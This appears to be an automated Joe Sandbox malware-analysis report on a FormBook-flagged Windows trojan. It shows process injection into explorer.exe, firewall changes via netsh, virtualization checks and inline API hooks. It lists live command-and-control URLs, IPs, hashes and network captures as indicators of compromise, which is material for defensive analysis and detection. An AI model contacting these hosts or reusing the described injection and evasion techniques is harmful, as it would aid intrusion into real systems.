          behaviorgraph top1 signatures2 2 Behavior Graph ID: 755996 Sample: 2022-571-GLS.exe Startdate: 29/11/2022 Architecture: WINDOWS Score: 100 45 Malicious sample detected (through community Yara rule) 2->45 47 Antivirus detection for URL or domain 2->47 49 Multi AV Scanner detection for submitted file 2->49 51 4 other signatures 2->51 11 2022-571-GLS.exe 19 2->11         started        process3 file4 31 C:\Users\user\AppData\Local\...\jsqqecy.exe, PE32 11->31 dropped 14 jsqqecy.exe 11->14         started        process5 signatures6 63 Multi AV Scanner detection for dropped file 14->63 65 Machine Learning detection for dropped file 14->65 67 Maps a DLL or memory area into another process 14->67 69 Tries to detect virtualization through RDTSC time measurements 14->69 17 jsqqecy.exe 14->17         started        process7 signatures8 39 Modifies the context of a thread in another process (thread injection) 17->39 41 Maps a DLL or memory area into another process 17->41 43 Queues an APC in another process (thread injection) 17->43 20 explorer.exe 17->20 injected process9 dnsIp10 33 www.fulili.com 45.221.114.43, 49698, 80 sun-asnSC South Africa 20->33 35 td-ccm-168-233.wixdns.net 34.117.168.233, 49696, 80 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG United States 20->35 37 4 other IPs or domains 20->37 53 System process connects to network (likely due to code injection or exploit) 20->53 55 Uses netsh to modify the Windows network and firewall settings 20->55 24 netsh.exe 20->24         started        signatures11 process12 signatures13 57 Modifies the context of a thread in another process (thread injection) 24->57 59 Maps a DLL or memory area into another process 24->59 61 Tries to detect virtualization through RDTSC time measurements 24->61 27 cmd.exe 1 24->27         started        process14 process15 29 conhost.exe 27->29         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          2022-571-GLS.exe30%ReversingLabsWin32.Packed.Generic
          2022-571-GLS.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\jsqqecy.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Temp\jsqqecy.exe20%ReversingLabsWin32.Trojan.FormBook

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          1.2.jsqqecy.exe.1090000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          0.2.2022-571-GLS.exe.400000.0.unpack100%AviraHEUR/AGEN.1223491Download File
          2.0.jsqqecy.exe.400000.5.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          0.0.2022-571-GLS.exe.400000.0.unpack100%AviraHEUR/AGEN.1223491Download File
          2.2.jsqqecy.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          td-ccm-168-233.wixdns.net0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.fulili.com/b31b/?8pq=tdO7S/Z/VqUa/I2xC15i+El5qu+HGrTkpc7PSFUM9PDChnmIJTvvTeLkqdaOGaksChda&q0DDzX=YreDi0%Avira URL Cloudsafe
          http://www.cdlcapitolsolutions.com/b31b/?8pq=gR42Xd1117OgJS+Outh2bFri+uyQrgf7E7TvWkJgQJ6aRmKfoh8EdM/DtT372TknNdyW&q0DDzX=YreDi100%Avira URL Cloudmalware
          http://www.easyentry.vip/b31b/?8pq=kQFV/3Ti5731GiKzPcF+l7m9iVSkkn86bXlgwK5ZhVk2Z3fCEdzJJK3qVV3FyS9CSUee&q0DDzX=YreDi0%Avira URL Cloudsafe
          www.cdlcapitolsolutions.com/b31b/100%Avira URL Cloudmalware
          www.cdlcapitolsolutions.com/b31b/1%VirustotalBrowse

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          td-ccm-168-233.wixdns.net
          		34.117.168.233
          		truetrueunknown
          www.fulili.com
          		45.221.114.43
          		truetrue
            		unknown
            825610.parkingcrew.net
            		75.2.81.221
            		truefalse
              		high
              www.cdlcapitolsolutions.com
              		unknown
              		unknowntrue
                		unknown
                www.easyentry.vip
                		unknown
                		unknowntrue
                  		unknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  http://www.cdlcapitolsolutions.com/b31b/?8pq=gR42Xd1117OgJS+Outh2bFri+uyQrgf7E7TvWkJgQJ6aRmKfoh8EdM/DtT372TknNdyW&q0DDzX=YreDitrue
                  • Avira URL Cloud: malware
                  		unknown
                  http://www.fulili.com/b31b/?8pq=tdO7S/Z/VqUa/I2xC15i+El5qu+HGrTkpc7PSFUM9PDChnmIJTvvTeLkqdaOGaksChda&q0DDzX=YreDitrue
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.easyentry.vip/b31b/?8pq=kQFV/3Ti5731GiKzPcF+l7m9iVSkkn86bXlgwK5ZhVk2Z3fCEdzJJK3qVV3FyS9CSUee&q0DDzX=YreDitrue
                  • Avira URL Cloud: safe
                  		unknown
                  www.cdlcapitolsolutions.com/b31b/true
                  • 1%, Virustotal, Browse
                  • Avira URL Cloud: malware
                  		low

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000003.00000000.364781909.0000000008260000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.317290516.0000000008260000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.347986981.0000000008260000.00000004.00000001.00020000.00000000.sdmpfalse
                    		high
                    http://nsis.sf.net/NSIS_Error2022-571-GLS.exefalse
                      		high
                      http://nsis.sf.net/NSIS_ErrorError2022-571-GLS.exefalse
                        		high

                        World Map of Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public IPs

                        IPDomainCountryFlagASNASN NameMalicious
                        45.221.114.43
                        		www.fulili.comSouth Africa
                        		328543sun-asnSCtrue
                        34.117.168.233
                        		td-ccm-168-233.wixdns.netUnited States
                        		139070GOOGLE-AS-APGoogleAsiaPacificPteLtdSGtrue
                        75.2.81.221
                        		825610.parkingcrew.netUnited States
                        		16509AMAZON-02USfalse

                        General Information

                        Joe Sandbox Version:36.0.0 Rainbow Opal
                        Analysis ID:755996
                        Start date and time:2022-11-29 13:15:07 +01:00
                        Joe Sandbox Product:CloudBasic
                        Overall analysis duration:0h 7m 57s
                        Hypervisor based Inspection enabled:false
                        Report type:light
                        Sample file name:2022-571-GLS.exe
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                        Number of analysed new started processes analysed:11
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:1
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • HDC enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Detection:MAL
                        Classification:mal100.troj.evad.winEXE@9/4@3/3
                        EGA Information:
                        • Successful, ratio: 100%
                        HDC Information:
                        • Successful, ratio: 68.9% (good quality ratio 59.8%)
                        • Quality average: 70.7%
                        • Quality standard deviation: 35.5%
                        HCA Information:
                        • Successful, ratio: 100%
                        • Number of executed functions: 0
                        • Number of non-executed functions: 0
                        Cookbook Comments:
                        • Found application associated with file extension: .exe

                        Warnings

                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe
                        • Not all processes where analyzed, report is missing behavior information
                        • Report creation exceeded maximum time and may have missing disassembly code information.

                        Simulations

                        Behavior and APIs

                        No simulations

                        Joe Sandbox View / Context

                        IPs

                        No context

                        Domains

                        No context

                        ASNs

                        No context

                        JA3 Fingerprints

                        No context

                        Dropped Files

                        No context

                        Created / dropped Files

                        C:\Users\user\AppData\Local\Temp\jsqqecy.exe

                        Download File
                        Process:C:\Users\user\Desktop\2022-571-GLS.exe
                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                        Category:dropped
                        Size (bytes):147968
                        Entropy (8bit):6.1823629557808895
                        Encrypted:false
                        SSDEEP:3072:5qOPPLBLPd3kaQ+nBwYb+SxRC//LhYcglg7JdWGAwDY4Y4OCJiy:5qiLBLPdm/DhwgF4GduSv
                        MD5:07875284CE0A6276F406B25F9E429270
                        SHA1:38A67882404FE8CD7473C8B1949A0B5384B36F94
                        SHA-256:AED6B2A3FB3845ECBC1AB0DFE26AED0CFFD1D220CA86F77BEBB44ECA02B3229E
                        SHA-512:5DB9EF373A1535012BFEA4E4052616C4AF565B57535B2F5F381261AD2D13213592BB4AA80FFDE21139E00D8EB1B5A2612F205F72CA816613510F0D292C0A44C1
                        Malicious:true
                        Antivirus:
                        • Antivirus: Joe Sandbox ML, Detection: 100%
                        • Antivirus: ReversingLabs, Detection: 20%
                        Reputation:low
                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...&.c..........................................@.......................................@.........................................................................................................`...................|............................text...0........................... ..`.rdata..$t.......v..................@..@.data....%...@......................@....00cfg.......p.......&..............@..@.voltbl."............(...................rsrc................*..............@..@.reloc...............,..............@..B................................................................................................................................................................................................................................................................................................................................................................

                        C:\Users\user\AppData\Local\Temp\nst2736.tmp

                        Download File
                        Process:C:\Users\user\Desktop\2022-571-GLS.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):351352
                        Entropy (8bit):7.441400818204764
                        Encrypted:false
                        SSDEEP:6144:FzKMbPJYY6ICfgM26evm226r8wqiLBLPdm/DhwgF4GduSv:08a+6xcqiLBLPcNnjdr
                        MD5:F1E31AC6BD355DFA2F813075E84BCD0D
                        SHA1:2C7C4B34C64E295DC9A1A7C803EB4E715AA00559
                        SHA-256:39D893328B257A69AAB166D4843B16970AA8DF9B615A7356B8D3DB8351CFF089
                        SHA-512:41B4422AB47A9FE2415678EA499D58F6AFF971044C581B95D8F6EC723248AD91CC622F6172D9B639DFEF4FAAFFD56F6180B63B03E3C1739C48FB54D34F510EFF
                        Malicious:false
                        Reputation:low
                        Preview:........,...................[...............................................................................................................................................................................................................................................................J...............!...j...........................................................................................................................................%...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                        C:\Users\user\AppData\Local\Temp\xduyswx.up

                        Download File
                        Process:C:\Users\user\Desktop\2022-571-GLS.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):5765
                        Entropy (8bit):6.2092599243644075
                        Encrypted:false
                        SSDEEP:96:xqZQ5qvebu9XscBHOPNr9p1H9sBL3I9I4kcAlsRW1aR1vOj4GV8rqxyRG2OJkac/:xiQqGq9Xs+O1smVr+8WxyfikaF0MOJOY
                        MD5:813EA3E20968DCA381FD705CCE6352AF
                        SHA1:F5641EE0577E29603C5146827B0F3E920B307011
                        SHA-256:BA88F948DE0F61DD0E1E09D5ABB977794A350380612C4F8E5AB7A7D5D3C5E108
                        SHA-512:681484352435EF93B1E3EC909F30627C4373CB5F862A60C523DA9A02AE5DA9292004BD5C1787686E9025C81A19C47AB25F7B6F7072A86E3211728B02A95A63F3
                        Malicious:false
                        Reputation:low
                        Preview:.f.. .\...+l.+l.+.+.+l...+. .\...zw+l.+$.+..-...\.V...=.0.+Z[.-.s..+jT.......+.z+-..Jc..w..+....j........b+.=.-........+.y .\...+l.+l.+.+.+l..'...|.t...=.0.E..y........c}...s....+.+}.z+.=.0U+..=.0.w+5.=.0.K...v4.jC..-........+.yy.zw+5.s.+gX+.d$..+|L+....+t`..+l...1..1..1}.=.0.+....|.N...[}.0V+..j[-.6.s...{....+}.....+.C...+.yy.zw .\...+l.+l.+.+.+l..0...|.-...+5.+.w1.....-.+...[.-.C...w..=.0{+}.K.1}...Pd..+...+.Et.C.L..+.~.[.Er....g.EjL.....[.+..g..[.-.+5.+..C..15.w1.....[.+}.6.s..s.l..{.....+.z+-..Jc..w..+....E.........b+.=.-........+.).....}....E}.1}..}.[.}.e.}...}.6.}.3C...C.......1}.....1}.....1}.....1}.....1}.....1}..R..1}.....1}.....1}.s..1}.&...1}.......-..Y...1}<.cZ...-..I...1}...6...-......1}.......-......1}8.l....-......1}D.zN...-......1}...U...-......1}..$.9..-....1}.s.l.....s.l....s.l....es.l.....js.l....iE}.1}.C.....+}.l1}.C5..3`+}.s.....+}....+....h.s.+}.4h....s.l.....s.i...h.[.-.s.l.....s.i...h.[.-hs.l......s.i....h.[.-ps.l

                        C:\Users\user\AppData\Local\Temp\zpnolg.oo

                        Download File
                        Process:C:\Users\user\Desktop\2022-571-GLS.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):189440
                        Entropy (8bit):7.990584575642086
                        Encrypted:true
                        SSDEEP:3072:lMbPJNjiLu5FhvUoerrdDaVCz37gMbapLPlA/evm2260F+8vV:lMbPJYY6ICfgM26evm226r89
                        MD5:1CBA56AA7342010C42DE3448072BFFD6
                        SHA1:41750AFCF5D21B6C3D1EF4D8B17CD5C283353206
                        SHA-256:1F2933BB236406B4E5E0C84B64441F7103E8860C3DB1014E1D07BEABD47AC584
                        SHA-512:E0DFB340E005729E784C828BEBFD428C147DB6EBC06A4261C960CE5CC2F5379A65DD723E7959A75A6D4F297AB5F7FC22ABE255D17E29E6D971E2E78845ADEE61
                        Malicious:false
                        Reputation:low
                        Preview:......b......+...Z]..[.S=.+4..O|......N..pF..X..+.L%..d..",.*.x....8-v@.).B!..g....:.@\f....r.jk...B..K.].C.../.xh....'e.i...._..?A..L......%....-.l....5..[.P;.(.j.|..s..?c..;..Kr{2/...,.UPU.`.c..A\i....t\?=..Ox.(..1 ..,z-tf\V.@.._..AZ9..BB.....^..x.b;...ML.w...]B....:..g-..|.n....N...F..X..+.L ..d..",.*.xo.!..=p.;b...9.#..k...)e..};.....<3..Z..'"..>r.4$..)1\...'e.i.R.}../..Aj.!g.[%.{..w. .G...=....>.......p!dX..?c..;...WX./..<C....q......]\i..r.K*%.U.......1 ..,z..3\V.@.....AZ....B.H..f^9.x.b....ML.w.2.]B....:...-.O|......N..pF..X..+.L%..d..",.*.xo.!..=p.;b...9.#..k...)e..};.....<3..Z..'"..>r.4$..)1\...'e.i.R.}../..Aj.!g.[%.{..w. .G...=....>.......p!dX..?c..;..Kr{2/...>..qq..;_..A\i..r.K*%.U.O..(..1 ..,z..3\V.@.....AZ....B.H..f^9.x.b....ML.w.2.]B....:...-.O|......N..pF..X..+.L%..d..",.*.xo.!..=p.;b...9.#..k...)e..};.....<3..Z..'"..>r.4$..)1\...'e.i.R.}../..Aj.!g.[%.{..w. .G...=....>.......p!dX..?c..;..Kr{2/...>..qq..;_..A\i..r.K*%.U.O..(..1 ..,z

                        Static File Info

                        General

                        File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                        Entropy (8bit):7.93130981619841
                        TrID:
                        • Win32 Executable (generic) a (10002005/4) 99.96%
                        • Generic Win/DOS Executable (2004/3) 0.02%
                        • DOS Executable Generic (2002/1) 0.02%
                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                        File name:2022-571-GLS.exe
                        File size:274453
                        MD5:6cc14805bbf5e6bfb4daae5c8a61af7e
                        SHA1:34836f2aa6a4e97705352a50d2a7147c857fea94
                        SHA256:029d4fe47cb21a8f4e1dbe1863cf43cba6ac777e008b9675d381fda82986196b
                        SHA512:5f1bb5a77d471e49e15ff414b24ac89858e5458884f8f672a92376434dd9363e6d80146d6448b4ee0233c70531f58c4c7d431d9f873e6d1a2fdacf680479b2c6
                        SSDEEP:6144:QBn14u11x6y/QH2tw81qVegiZU/S4RaXFKia7ZiOfu:g4uRX4WvqMgiZgSXFKhZiO2
                        TLSH:224412ABB2E70AB3C46345729F35B331E67EE910113456BF33E22E779E702979406291
                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........3(..RF..RF..RF.*]...RF..RG.pRF.*]...RF..qv..RF..T@..RF.Rich.RF.........................PE..L...ly.V.................^.........

                        File Icon

                        Icon Hash:b2a88c96b2ca6a72

                        Static PE Info

                        General

                        Entrypoint:0x40324f
                        Entrypoint Section:.text
                        Digitally signed:false
                        Imagebase:0x400000
                        Subsystem:windows gui
                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                        DLL Characteristics:TERMINAL_SERVER_AWARE
                        Time Stamp:0x567F796C [Sun Dec 27 05:38:52 2015 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:
                        OS Version Major:4
                        OS Version Minor:0
                        File Version Major:4
                        File Version Minor:0
                        Subsystem Version Major:4
                        Subsystem Version Minor:0
                        Import Hash:ab6770b0a8635b9d92a5838920cfe770

                        Entrypoint Preview

                        Instruction
                        sub esp, 00000180h
                        push ebx
                        push ebp
                        push esi
                        push edi
                        xor ebx, ebx
                        push 00008001h
                        mov dword ptr [esp+1Ch], ebx
                        mov dword ptr [esp+14h], 00409130h
                        xor esi, esi
                        mov byte ptr [esp+18h], 00000020h
                        call dword ptr [004070B8h]
                        call dword ptr [004070B4h]
                        cmp ax, 00000006h
                        je 00007F91F4D06083h
                        push ebx
                        call 00007F91F4D08E71h
                        cmp eax, ebx
                        je 00007F91F4D06079h
                        push 00000C00h
                        call eax
                        push 004091E0h
                        call 00007F91F4D08DF2h
                        push 004091D8h
                        call 00007F91F4D08DE8h
                        push 004091CCh
                        call 00007F91F4D08DDEh
                        push 0000000Dh
                        call 00007F91F4D08E41h
                        push 0000000Bh
                        call 00007F91F4D08E3Ah
                        mov dword ptr [00423F84h], eax
                        call dword ptr [00407034h]
                        push ebx
                        call dword ptr [00407270h]
                        mov dword ptr [00424038h], eax
                        push ebx
                        lea eax, dword ptr [esp+34h]
                        push 00000160h
                        push eax
                        push ebx
                        push 0041F538h
                        call dword ptr [00407160h]
                        push 004091C0h
                        push 00423780h
                        call 00007F91F4D08A71h
                        call dword ptr [004070B0h]
                        mov ebp, 0042A000h
                        push eax
                        push ebp
                        call 00007F91F4D08A5Fh
                        push ebx
                        call dword ptr [00407144h]

                        Rich Headers

                        Programming Language:
                        • [EXP] VC++ 6.0 SP5 build 8804

                        Data Directories

                        NameVirtual AddressVirtual Size Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IMPORT0x73cc0xa0.rdata
                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x2d0000x9e0.rsrc
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IAT0x70000x280.rdata
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                        Sections

                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                        .text0x10000x5c4a0x5e00False0.659906914893617data6.410763775060762IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        .rdata0x70000x115e0x1200False0.4466145833333333data5.142548180775325IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        .data0x90000x1b0780x600False0.455078125data4.2252195571372315IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .ndata0x250000x80000x0False0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .rsrc0x2d0000x9e00xa00False0.45625data4.509328731926377IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                        Resources

                        NameRVASizeTypeLanguageCountry
                        RT_ICON0x2d1900x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640EnglishUnited States
                        RT_DIALOG0x2d4780x100dataEnglishUnited States
                        RT_DIALOG0x2d5780x11cdataEnglishUnited States
                        RT_DIALOG0x2d6980x60dataEnglishUnited States
                        RT_GROUP_ICON0x2d6f80x14dataEnglishUnited States
                        RT_MANIFEST0x2d7100x2ccXML 1.0 document, ASCII text, with very long lines (716), with no line terminatorsEnglishUnited States

                        Imports

                        DLLImport
                        KERNEL32.dllSetFileAttributesA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CompareFileTime, SearchPathA, Sleep, GetTickCount, CreateFileA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, CreateDirectoryA, lstrcmpiA, GetTempPathA, GetCommandLineA, GetVersion, SetErrorMode, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, LoadLibraryA, SetFileTime, CloseHandle, GlobalFree, lstrcmpA, ExpandEnvironmentStringsA, GetExitCodeProcess, GlobalAlloc, WaitForSingleObject, ExitProcess, GetWindowsDirectoryA, GetProcAddress, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, ReadFile, FindClose, GetPrivateProfileStringA, WritePrivateProfileStringA, WriteFile, MulDiv, LoadLibraryExA, GetModuleHandleA, MultiByteToWideChar, FreeLibrary
                        USER32.dllGetWindowRect, EnableMenuItem, GetSystemMenu, ScreenToClient, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetForegroundWindow, PostQuitMessage, RegisterClassA, EndDialog, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, DestroyWindow, OpenClipboard, TrackPopupMenu, SendMessageTimeoutA, GetDC, LoadImageA, GetDlgItem, FindWindowExA, IsWindow, SetClipboardData, SetWindowLongA, EmptyClipboard, SetTimer, CreateDialogParamA, wsprintfA, ShowWindow, SetWindowTextA
                        GDI32.dllSelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                        SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA
                        ADVAPI32.dllRegDeleteValueA, SetFileSecurityA, RegOpenKeyExA, RegDeleteKeyA, RegEnumValueA, RegCloseKey, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
                        COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                        ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

                        Possible Origin

                        Language of compilation systemCountry where language is spokenMap
                        EnglishUnited States

                        Network Behavior

                        Network Port Distribution

                        TCP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Nov 29, 2022 13:17:16.933298111 CET4969680192.168.2.434.117.168.233
                        Nov 29, 2022 13:17:16.956123114 CET804969634.117.168.233192.168.2.4
                        Nov 29, 2022 13:17:16.956255913 CET4969680192.168.2.434.117.168.233
                        Nov 29, 2022 13:17:16.956408024 CET4969680192.168.2.434.117.168.233
                        Nov 29, 2022 13:17:16.978993893 CET804969634.117.168.233192.168.2.4
                        Nov 29, 2022 13:17:17.045778036 CET804969634.117.168.233192.168.2.4
                        Nov 29, 2022 13:17:17.045831919 CET804969634.117.168.233192.168.2.4
                        Nov 29, 2022 13:17:17.045938969 CET4969680192.168.2.434.117.168.233
                        Nov 29, 2022 13:17:17.046009064 CET4969680192.168.2.434.117.168.233
                        Nov 29, 2022 13:17:17.068516970 CET804969634.117.168.233192.168.2.4
                        Nov 29, 2022 13:17:37.271229029 CET4969780192.168.2.475.2.81.221
                        Nov 29, 2022 13:17:37.290606976 CET804969775.2.81.221192.168.2.4
                        Nov 29, 2022 13:17:37.290796041 CET4969780192.168.2.475.2.81.221
                        Nov 29, 2022 13:17:37.291032076 CET4969780192.168.2.475.2.81.221
                        Nov 29, 2022 13:17:37.310297966 CET804969775.2.81.221192.168.2.4
                        Nov 29, 2022 13:17:37.432542086 CET804969775.2.81.221192.168.2.4
                        Nov 29, 2022 13:17:37.432614088 CET804969775.2.81.221192.168.2.4
                        Nov 29, 2022 13:17:37.432749987 CET4969780192.168.2.475.2.81.221
                        Nov 29, 2022 13:17:37.432842016 CET4969780192.168.2.475.2.81.221
                        Nov 29, 2022 13:17:37.447979927 CET804969775.2.81.221192.168.2.4
                        Nov 29, 2022 13:17:37.448339939 CET4969780192.168.2.475.2.81.221
                        Nov 29, 2022 13:17:37.452009916 CET804969775.2.81.221192.168.2.4
                        Nov 29, 2022 13:17:57.920108080 CET4969880192.168.2.445.221.114.43
                        Nov 29, 2022 13:17:58.118402004 CET804969845.221.114.43192.168.2.4
                        Nov 29, 2022 13:17:58.127572060 CET4969880192.168.2.445.221.114.43
                        Nov 29, 2022 13:17:58.127811909 CET4969880192.168.2.445.221.114.43
                        Nov 29, 2022 13:17:58.326272964 CET804969845.221.114.43192.168.2.4
                        Nov 29, 2022 13:17:58.326320887 CET804969845.221.114.43192.168.2.4
                        Nov 29, 2022 13:17:58.332259893 CET4969880192.168.2.445.221.114.43
                        Nov 29, 2022 13:17:58.332482100 CET4969880192.168.2.445.221.114.43
                        Nov 29, 2022 13:17:58.530942917 CET804969845.221.114.43192.168.2.4

                        UDP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Nov 29, 2022 13:17:16.879111052 CET5091153192.168.2.48.8.8.8
                        Nov 29, 2022 13:17:16.917241096 CET53509118.8.8.8192.168.2.4
                        Nov 29, 2022 13:17:37.245763063 CET5968353192.168.2.48.8.8.8
                        Nov 29, 2022 13:17:37.270123005 CET53596838.8.8.8192.168.2.4
                        Nov 29, 2022 13:17:57.618912935 CET6416753192.168.2.48.8.8.8
                        Nov 29, 2022 13:17:57.917346954 CET53641678.8.8.8192.168.2.4

                        DNS Queries

                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                        Nov 29, 2022 13:17:16.879111052 CET192.168.2.48.8.8.80xf9d3Standard query (0)www.cdlcapitolsolutions.comA (IP address)IN (0x0001)false
                        Nov 29, 2022 13:17:37.245763063 CET192.168.2.48.8.8.80x5ae3Standard query (0)www.easyentry.vipA (IP address)IN (0x0001)false
                        Nov 29, 2022 13:17:57.618912935 CET192.168.2.48.8.8.80x9a51Standard query (0)www.fulili.comA (IP address)IN (0x0001)false

                        DNS Answers

                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                        Nov 29, 2022 13:17:16.917241096 CET8.8.8.8192.168.2.40xf9d3No error (0)www.cdlcapitolsolutions.comgcdn0.wixdns.netCNAME (Canonical name)IN (0x0001)false
                        Nov 29, 2022 13:17:16.917241096 CET8.8.8.8192.168.2.40xf9d3No error (0)gcdn0.wixdns.nettd-ccm-168-233.wixdns.netCNAME (Canonical name)IN (0x0001)false
                        Nov 29, 2022 13:17:16.917241096 CET8.8.8.8192.168.2.40xf9d3No error (0)td-ccm-168-233.wixdns.net34.117.168.233A (IP address)IN (0x0001)false
                        Nov 29, 2022 13:17:37.270123005 CET8.8.8.8192.168.2.40x5ae3No error (0)www.easyentry.vip825610.parkingcrew.netCNAME (Canonical name)IN (0x0001)false
                        Nov 29, 2022 13:17:37.270123005 CET8.8.8.8192.168.2.40x5ae3No error (0)825610.parkingcrew.net75.2.81.221A (IP address)IN (0x0001)false
                        Nov 29, 2022 13:17:57.917346954 CET8.8.8.8192.168.2.40x9a51No error (0)www.fulili.com45.221.114.43A (IP address)IN (0x0001)false

                        HTTP Request Dependency Graph

                        • www.cdlcapitolsolutions.com
                        • www.easyentry.vip
                        • www.fulili.com

                        Code Manipulations

                        User Modules

                        Hook Summary

                        Function NameHook TypeActive in Processes
                        PeekMessageAINLINEexplorer.exe
                        PeekMessageWINLINEexplorer.exe
                        GetMessageWINLINEexplorer.exe
                        GetMessageAINLINEexplorer.exe

                        Processes

                        Process: explorer.exe, Module: user32.dll
                        Function NameHook TypeNew Data
                        PeekMessageAINLINE0x48 0x8B 0xB8 0x8B 0xBE 0xE5
                        PeekMessageWINLINE0x48 0x8B 0xB8 0x83 0x3E 0xE5
                        GetMessageWINLINE0x48 0x8B 0xB8 0x83 0x3E 0xE5
                        GetMessageAINLINE0x48 0x8B 0xB8 0x8B 0xBE 0xE5

                        Statistics

                        Behavior

                        Click to jump to process

                        System Behavior

                        General

                        Target ID:0
                        Start time:13:15:56
                        Start date:29/11/2022
                        Path:C:\Users\user\Desktop\2022-571-GLS.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Users\user\Desktop\2022-571-GLS.exe
                        Imagebase:0x400000
                        File size:274453 bytes
